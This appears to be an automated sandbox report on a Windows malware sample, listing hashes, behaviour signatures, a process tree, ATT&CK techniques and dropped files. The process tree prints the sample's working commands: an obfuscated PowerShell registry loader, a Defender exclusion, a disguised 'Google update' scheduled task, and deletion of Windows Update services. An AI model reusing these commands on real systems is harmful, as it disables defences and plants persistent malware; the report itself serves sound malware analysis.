Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2023 08:30

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{07f7d231-682b-448d-a41b-c0deaf9f5594}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:556
      • C:\Windows\SysWOW64\dllhost.exe
        C:\Windows\SysWOW64\dllhost.exe /Processid:{d9280c1e-3af1-4303-9b38-03dd0dbc0fb7}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:584
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:468
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
        2⤵
          PID:740
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs
          2⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious use of AdjustPrivilegeToken
          PID:848
          • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            3⤵
              PID:1928
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {5F301E94-55C8-4AFE-921E-717E8A6E49CB} S-1-5-18:NT AUTHORITY\System:Service:
              3⤵
              • Loads dropped DLL
              PID:948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1204
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:568
              • C:\Program Files\Google\Chrome\updater.exe
                "C:\Program Files\Google\Chrome\updater.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Suspicious use of AdjustPrivilegeToken
                PID:320
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  5⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:456
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                  5⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1680
                  • C:\Windows\system32\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                    6⤵
                    • Creates scheduled task(s)
                    PID:1672
                • C:\Windows\system32\cmd.exe
                  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                  5⤵
                    PID:996
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      6⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1032
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      6⤵
                        PID:1652
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -standby-timeout-ac 0
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1032
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -standby-timeout-dc 0
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1520
                    • C:\Windows\system32\cmd.exe
                      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                      5⤵
                        PID:1128
                        • C:\Windows\system32\sc.exe
                          sc stop UsoSvc
                          6⤵
                          • Launches sc.exe
                          PID:1584
                        • C:\Windows\system32\sc.exe
                          sc stop WaaSMedicSvc
                          6⤵
                          • Launches sc.exe
                          PID:1256
                        • C:\Windows\system32\sc.exe
                          sc stop wuauserv
                          6⤵
                          • Launches sc.exe
                          PID:1100
                        • C:\Windows\system32\sc.exe
                          sc stop bits
                          6⤵
                          • Launches sc.exe
                          PID:760
                        • C:\Windows\system32\sc.exe
                          sc stop dosvc
                          6⤵
                          • Launches sc.exe
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1652
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                          6⤵
                            PID:1616
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                            6⤵
                              PID:1172
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                              6⤵
                                PID:1544
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                6⤵
                                  PID:2032
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  6⤵
                                    PID:1584
                                • C:\Windows\system32\dialer.exe
                                  C:\Windows\system32\dialer.exe xtrjicqmdliu
                                  5⤵
                                    PID:1308
                                    • C:\Windows\system32\cmd.exe
                                      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      6⤵
                                      • Drops file in Program Files directory
                                      PID:1476
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    5⤵
                                    • Drops file in Program Files directory
                                    PID:1512
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                      6⤵
                                      • Detects videocard installed
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1956
                                  • C:\Windows\system32\dialer.exe
                                    C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                    5⤵
                                      PID:1072
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService
                                2⤵
                                  PID:972
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService
                                  2⤵
                                    PID:280
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                                    2⤵
                                      PID:816
                                      • C:\Windows\system32\Dwm.exe
                                        "C:\Windows\system32\Dwm.exe"
                                        3⤵
                                          PID:1176
                                      • C:\Windows\System32\spoolsv.exe
                                        C:\Windows\System32\spoolsv.exe
                                        2⤵
                                          PID:340
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k RPCSS
                                          2⤵
                                            PID:676
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                            2⤵
                                              PID:1052
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k DcomLaunch
                                              2⤵
                                                PID:600
                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  3⤵
                                                  • Checks processor information in registry
                                                  PID:1616
                                              • C:\Windows\system32\taskhost.exe
                                                "taskhost.exe"
                                                2⤵
                                                  PID:1136
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                                  2⤵
                                                    PID:804
                                                  • C:\Windows\system32\sppsvc.exe
                                                    C:\Windows\system32\sppsvc.exe
                                                    2⤵
                                                      PID:528
                                                  • C:\Windows\system32\lsass.exe
                                                    C:\Windows\system32\lsass.exe
                                                    1⤵
                                                      PID:476
                                                    • C:\Windows\system32\lsm.exe
                                                      C:\Windows\system32\lsm.exe
                                                      1⤵
                                                        PID:484
                                                      • C:\Windows\Explorer.EXE
                                                        C:\Windows\Explorer.EXE
                                                        1⤵
                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:1248
                                                        • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          • Drops file in Program Files directory
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1364
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                            3⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1152
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1384
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop UsoSvc
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:296
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop WaaSMedicSvc
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:556
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop wuauserv
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:1664
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop bits
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:1892
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop dosvc
                                                              4⤵
                                                              • Launches sc.exe
                                                              PID:2000
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                              4⤵
                                                                PID:552
                                                              • C:\Windows\system32\reg.exe
                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                4⤵
                                                                  PID:1988
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                  4⤵
                                                                  • Modifies security service
                                                                  PID:1168
                                                                • C:\Windows\system32\reg.exe
                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                  4⤵
                                                                    PID:1764
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                    4⤵
                                                                      PID:636
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    3⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:584
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1828
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:900
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      powercfg /x -standby-timeout-ac 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1584
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      powercfg /x -standby-timeout-dc 0
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1000
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                    3⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:672
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                      4⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:524
                                                                  • C:\Windows\system32\dialer.exe
                                                                    C:\Windows\system32\dialer.exe
                                                                    3⤵
                                                                    • Drops file in Windows directory
                                                                    PID:836
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                    3⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1072
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                      4⤵
                                                                        PID:1872
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "19387972241512585508775902063-770367084111309219610835078772091967417924537665"
                                                                  1⤵
                                                                    PID:592
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "-1762930710-1810975771-1909059443-12986873881983878616-1196646335-4056316831046818306"
                                                                    1⤵
                                                                      PID:1004
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "465191542-13271134963070762241808683761263050543-1357736105-591656820-1821344793"
                                                                      1⤵
                                                                        PID:1328
                                                                      • C:\Windows\system32\conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe "-13712896921315988633-646937543-11101801766739312162132436828-1817427182-1620231770"
                                                                        1⤵
                                                                          PID:1300
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "-926287050-2114319891-21120764151934006926-896352991659170595-543848872-1603390531"
                                                                          1⤵
                                                                            PID:2024
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "19789499313549780479305097294498776227234904791307150500917444964-1254275782"
                                                                            1⤵
                                                                              PID:1696
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "726325594-1834741115144071641716349307451237132241990322029-1802753997396983026"
                                                                              1⤵
                                                                                PID:1100

                                                                              Network

                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                              Execution

                                                                              Scheduled Task

                                                                              1
                                                                              T1053

                                                                              Persistence

                                                                              Modify Existing Service

                                                                              2
                                                                              T1031

                                                                              Registry Run Keys / Startup Folder

                                                                              1
                                                                              T1060

                                                                              Scheduled Task

                                                                              1
                                                                              T1053

                                                                              Privilege Escalation

                                                                              Scheduled Task

                                                                              1
                                                                              T1053

                                                                              Defense Evasion

                                                                              Modify Registry

                                                                              2
                                                                              T1112

                                                                              Impair Defenses

                                                                              1
                                                                              T1562

                                                                              Discovery

                                                                              Query Registry

                                                                              2
                                                                              T1012

                                                                              System Information Discovery

                                                                              2
                                                                              T1082

                                                                              Impact

                                                                              Service Stop

                                                                              1
                                                                              T1489

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Program Files\Google\Chrome\updater.exe
                                                                                Filesize

                                                                                2.8MB

                                                                                MD5

                                                                                eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                SHA1

                                                                                c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                SHA256

                                                                                9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                SHA512

                                                                                ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                              • C:\Program Files\Google\Chrome\updater.exe
                                                                                Filesize

                                                                                2.8MB

                                                                                MD5

                                                                                eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                SHA1

                                                                                c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                SHA256

                                                                                9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                SHA512

                                                                                ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                              • C:\Program Files\Google\Libs\g.log
                                                                                Filesize

                                                                                198B

                                                                                MD5

                                                                                37dd19b2be4fa7635ad6a2f3238c4af1

                                                                                SHA1

                                                                                e5b2c034636b434faee84e82e3bce3a3d3561943

                                                                                SHA256

                                                                                8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                                                                                SHA512

                                                                                86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                afaf3141043b3a7428136495fe12f5c2

                                                                                SHA1

                                                                                9c089296dc8fe88fbb0d040955458c34363798f2

                                                                                SHA256

                                                                                1f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696

                                                                                SHA512

                                                                                17e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                afaf3141043b3a7428136495fe12f5c2

                                                                                SHA1

                                                                                9c089296dc8fe88fbb0d040955458c34363798f2

                                                                                SHA256

                                                                                1f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696

                                                                                SHA512

                                                                                17e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L528LL6EV9QXYFC8S2U5.temp
                                                                                Filesize

                                                                                7KB

                                                                                MD5

                                                                                afaf3141043b3a7428136495fe12f5c2

                                                                                SHA1

                                                                                9c089296dc8fe88fbb0d040955458c34363798f2

                                                                                SHA256

                                                                                1f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696

                                                                                SHA512

                                                                                17e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5

                                                                              • C:\Windows\Tasks\dialersvc32.job
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                24139b140a5eefe7790598725ae1a2ee

                                                                                SHA1

                                                                                8eb3186794fe51bdc8c90b00be98e4d9341c1069

                                                                                SHA256

                                                                                b3e9853e35550b4d41d8485a2355afa560685348cf779f53ed8aad241db9f40d

                                                                                SHA512

                                                                                d26c807ab110b94c64c8f1bbbeb83b6fc646e382f2753d5563f3caa2a8cb9afea2eef3173c6f27c3360cd4797ddd0a2dc53dc5b772f7bd24172febb397771056

                                                                              • \??\PIPE\srvsvc
                                                                                MD5

                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                SHA1

                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                SHA256

                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                SHA512

                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                              • \??\PIPE\srvsvc
                                                                                MD5

                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                SHA1

                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                SHA256

                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                SHA512

                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                              • \Program Files\Google\Chrome\updater.exe
                                                                                Filesize

                                                                                2.8MB

                                                                                MD5

                                                                                eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                SHA1

                                                                                c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                SHA256

                                                                                9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                SHA512

